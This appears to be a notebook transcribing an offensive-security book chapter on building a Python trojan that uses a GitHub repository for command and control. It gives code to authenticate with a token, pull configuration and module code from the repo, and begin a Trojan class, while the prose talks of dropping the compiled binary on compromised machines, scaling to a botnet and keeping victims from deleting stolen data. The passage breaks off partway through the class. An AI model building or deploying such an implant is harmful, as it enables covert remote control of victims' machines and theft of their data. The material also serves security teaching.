<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C7-Command_And_Control/Building_A_Github_Aware_Trojan.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Building a Github-Aware Trojan__*

The main trojan will retrieve configuration options and code to run from Github. Let's start by writing the functions that connect and authenticate to the Github API and then communicate with it. Open a new file called __git_trojan.py__ and enter the following:

In [ ]:
import base64
import github3
import importlib
import json
import random
import sys
import threading
import time

from datetime import datetime

This simple setup code contains the necessary imports, which should keep our overall trojan size relatively small when compiled. We say __relatively__ because most compiled Python binaries using __pyinstaller__ are around __7MB__. (You can check out __pyinstaller__ here: https://www.pyinstaller.org/downloads.html). We'll drop this binary on the compromised machine.

If you were to explode this technique to build a full __botnet__ (a network of many such implants), you'd want the ability to automatically generate trojans, set their ID, create a configuration file that's pushed to Github, and compile the trojan into an executable. We won't build a botnet today, though; we'll let your imagination do the work.

Now let's put the relevant Github code in place:

In [ ]:
def github_connect(): #[1]
    with open('mytoken.txt') as f:
        token = f.read()
    user = 'tiarno'
    sess = github3.login(token=token)
    return sess.repository(user, 'bhptrojan')

def get_file_contents(dirname, module_name, repo): #[2]
    return repo.file_contents(f'{dirname}/{module_name}').content

These two functions handle the interaction with the Github repository. The __github_connect__ function reads the token created on Github __[1]__. When you created the token, you wrote it to a file called __mytoken.txt__. Now we read the token from that file and return a connection to the Github repository. You may want to create different tokens for different trojans so you can control what each trojan can access in your repository. That way, if victims catch your trojan, they can't come along and delete all of your retrieved data.

The __get_file_contents__ function receives the directory name, module name, and repository connection and returns the contents of the specified module __[2]__. This function is responsible for grabbing files from the remote repo and reading the contents in locally. We'll use it for reading both configuration options and the module source code.

Now we will create a __Trojan__ class that performs the essential trojaning tasks:

In [ ]:
class Trojan:
    def __init__(self, id): #[1]
        self.id = id
        self.config_file = f'{id}.json'
        self.data_path = f'data/{id}/' #[2]
        self.repo = github_connect() #[3]